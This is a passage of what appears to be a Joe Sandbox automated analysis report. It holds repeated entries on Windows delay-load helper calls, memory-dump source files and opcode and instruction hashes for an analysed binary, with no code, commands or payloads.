• ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
  • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
  • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: ffdbb3097a45653ca26fbdd3328a8161f718dc1b6aa5cef2aecc00b88ce9f713
• Instruction ID: 9a003c84d7c646492a841c8c150f1f2e02730ab5aacb26665b28f3e18565419c
• Opcode Fuzzy Hash: ffdbb3097a45653ca26fbdd3328a8161f718dc1b6aa5cef2aecc00b88ce9f713
• Instruction Fuzzy Hash: B4B0129D26C210BC320451343E12E3F012CD1C9F10330CB1AF404C1142D8409C441131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
  • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
  • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: ed86da10e61a1f34294701db00bba2fd81a0ec250ac967191675ac3cc71f23dd
• Instruction ID: 3388b6fe34842c98850512e5b39bc39d4369fa3367cbda087a671b82973cc56d
• Opcode Fuzzy Hash: ed86da10e61a1f34294701db00bba2fd81a0ec250ac967191675ac3cc71f23dd
• Instruction Fuzzy Hash: 88B012A936C010BC320411303F02E3F012CD1C4F20330CB2AF400C005398429D451031
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 3f2498114e5c31157a7332ce6e799f2cf1f608020eabbc828764919a4d969c45
                                                                                                                                                      • Instruction ID: b89b6f7dd7ee2da175a8ff13110ca7168918549a9386d67efab5d26f51762a53
                                                                                                                                                      • Opcode Fuzzy Hash: 3f2498114e5c31157a7332ce6e799f2cf1f608020eabbc828764919a4d969c45
                                                                                                                                                      • Instruction Fuzzy Hash: F1B0129926C111BC320855343E02E3F012CD1C9F10330CB2AF404C1142D4408C481131
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: fd43649fc817319126de4d04323ab6e164fec9d49b21e3b3f983366bc6ddcea3
                                                                                                                                                      • Instruction ID: 3201057de76f7f07d6b59c6e25f5ca07a63ec00d9a2b0b4e4f9420d29f66a723
                                                                                                                                                      • Opcode Fuzzy Hash: fd43649fc817319126de4d04323ab6e164fec9d49b21e3b3f983366bc6ddcea3
                                                                                                                                                      • Instruction Fuzzy Hash: 74B0129926C010BC320851343F02E3F012CD1C8F10330CB3AF404C1142D4418D4D1131
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 589afe705859a4c81d9de3d1b716b24b3e3f0111829d63240911dc2a148ef6fb
                                                                                                                                                      • Instruction ID: 8b9185966c0285fd03c0e552777bb205210347bbecac90244fcb52ec763223d5
                                                                                                                                                      • Opcode Fuzzy Hash: 589afe705859a4c81d9de3d1b716b24b3e3f0111829d63240911dc2a148ef6fb
                                                                                                                                                      • Instruction Fuzzy Hash: 66B0129D26C210FC334451343E12E3F012CD1C8F10330CB2AF004C1542D8408C841131
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: e8d805d5cafa420ac98cd3e041c5c9d15caef0bf2cdea93746f0e5f3a82fa06f
                                                                                                                                                      • Instruction ID: 20ebcfb482968016f1b1716aea2b4634c4fd9ad6f98126623d2b2d0103f0dd77
                                                                                                                                                      • Opcode Fuzzy Hash: e8d805d5cafa420ac98cd3e041c5c9d15caef0bf2cdea93746f0e5f3a82fa06f
                                                                                                                                                      • Instruction Fuzzy Hash: F5B0129D26C210BC320451343F12E3F012CD1C8F10330CB2AF404C1142D8418E451131
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: db8dcdc8434ff8c758c492623aea965db46a44719e896e66f0942356eea0a4a1
                                                                                                                                                      • Instruction ID: 514879f0ec317471c1fc9236bac8a5411521ca5df4ffb99bde649622e10b788d
                                                                                                                                                      • Opcode Fuzzy Hash: db8dcdc8434ff8c758c492623aea965db46a44719e896e66f0942356eea0a4a1
                                                                                                                                                      • Instruction Fuzzy Hash: ECB0129D26C110BC320451343E12E3F022CE1C8F10330CB1AF004C1142D8408C441231
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44918
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 334737f9f34efe70fe301af6c4cb1f876ee9c9ff5ac9ff7d35229a4eac7ca41a
                                                                                                                                                      • Instruction ID: 75869cf5a54001dfc9515b26315a3dcef555fcbee1b6d4500a4d4f1ae6a348dd
                                                                                                                                                      • Opcode Fuzzy Hash: 334737f9f34efe70fe301af6c4cb1f876ee9c9ff5ac9ff7d35229a4eac7ca41a
                                                                                                                                                      • Instruction Fuzzy Hash: CAB0129926C110BC320451343E03E3F012CD1C9F10330CF1AF404C5042D4408C441131
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44B3B
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: c986b53adf7e4b71d4c9d1d6f4ef3a01bbdfcb12a9aa8a8a86ef754faf1cca0c
                                                                                                                                                      • Instruction ID: 07c07083713b904c2a9f73b5affefe76a3e9c63bc406d2f324dd1f0338bbe477
                                                                                                                                                      • Opcode Fuzzy Hash: c986b53adf7e4b71d4c9d1d6f4ef3a01bbdfcb12a9aa8a8a86ef754faf1cca0c
                                                                                                                                                      • Instruction Fuzzy Hash: 99B0029926D311FD714451595E67F7F116DD5C9F15331D62AF405C5185D8405C4A1131
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44B3B
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 12011dfee19fb137e07a05ab6dd0f8e2a839181c4c1ebd58732e0c935de70ca9
                                                                                                                                                      • Instruction ID: 2851854baed083c083f77b933ab4dc693230661050962689876efbf6c87898b4
                                                                                                                                                      • Opcode Fuzzy Hash: 12011dfee19fb137e07a05ab6dd0f8e2a839181c4c1ebd58732e0c935de70ca9
                                                                                                                                                      • Instruction Fuzzy Hash: 99B0129926C110BC310451199F03F3F022CD1C8F11330D71AF004C1085D8404C4B0031
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44B3B
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: ce7dd99c072d8c1a64a9b0c5fe2ddcfd99212c8611b5c3c4015d50ac9c330873
                                                                                                                                                      • Instruction ID: 4dcf9da46b4f1b18379ccc1989910e90f8d18b73ca67190d6ca169594a1a9db3
                                                                                                                                                      • Opcode Fuzzy Hash: ce7dd99c072d8c1a64a9b0c5fe2ddcfd99212c8611b5c3c4015d50ac9c330873
                                                                                                                                                      • Instruction Fuzzy Hash: DFB0129926C210BC320451199E03F3F022CD1C8F11330D72AF004C10C5D8404C8E0031
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44C90
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: 595c0555d879d553283be33bc20f3e41f2b54fd92fcd57078dfa5905f5dba9bb
                                                                                                                                                      • Instruction ID: 55cbfbe1a4176ad3612bc01158a7db6514897b1f3bcea3cd8a58bab54d11b353
                                                                                                                                                      • Opcode Fuzzy Hash: 595c0555d879d553283be33bc20f3e41f2b54fd92fcd57078dfa5905f5dba9bb
                                                                                                                                                      • Instruction Fuzzy Hash: B3B0129926D000FC314451241F02E3F012CD1C8F12331C62AF004C1041D4400C4A0031
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44C90
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: fdb7e3c00a85bb1ea55b92528f578261ca13cf375c29296c5fcb5df657dca979
                                                                                                                                                      • Instruction ID: 0a2c6f5605c0191ecf08fcea428e9831a18ad0ab397380d29bc0634fdb22224b
                                                                                                                                                      • Opcode Fuzzy Hash: fdb7e3c00a85bb1ea55b92528f578261ca13cf375c29296c5fcb5df657dca979
                                                                                                                                                      • Instruction Fuzzy Hash: 97B0129926D001FC314451241E02F3E012CF1C8F12331C62AF004C1441D4400C490031
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44C90
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: cb2f5c852257f91aecc28c10347ad395dc35ce58466f934926ffb882098ad4c7
                                                                                                                                                      • Instruction ID: 33d50e4d7b7d964280a28b83e472413acc0cf54072caf3c51f89e766d5d0dcd8
                                                                                                                                                      • Opcode Fuzzy Hash: cb2f5c852257f91aecc28c10347ad395dc35ce58466f934926ffb882098ad4c7
                                                                                                                                                      • Instruction Fuzzy Hash: 01B0129926D100FC314451341E02E3F012CD1C8F12331C62AF404C1041D4400C490431
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44C90
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1269201914-0
                                                                                                                                                      • Opcode ID: f9234707e0e56af36b8d77f5eb5ac1128958b22f8e42eb34266e438caf5888c7
                                                                                                                                                      • Instruction ID: 59d5046564f81aeae3499aab8fe430a0daa76465ee59098fa5c14639f52ba7ee
                                                                                                                                                      • Opcode Fuzzy Hash: f9234707e0e56af36b8d77f5eb5ac1128958b22f8e42eb34266e438caf5888c7
                                                                                                                                                      • Instruction Fuzzy Hash: 1EB0129D2AD000FC310411141F02D3F012CD9D4F12332C71AF000C004294400C460031
                                                                                                                                                      APIs
                                                                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A44CF1
                                                                                                                                                        • Part of subcall function 00A44FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A45041
                                                                                                                                                        • Part of subcall function 00A44FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A45052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
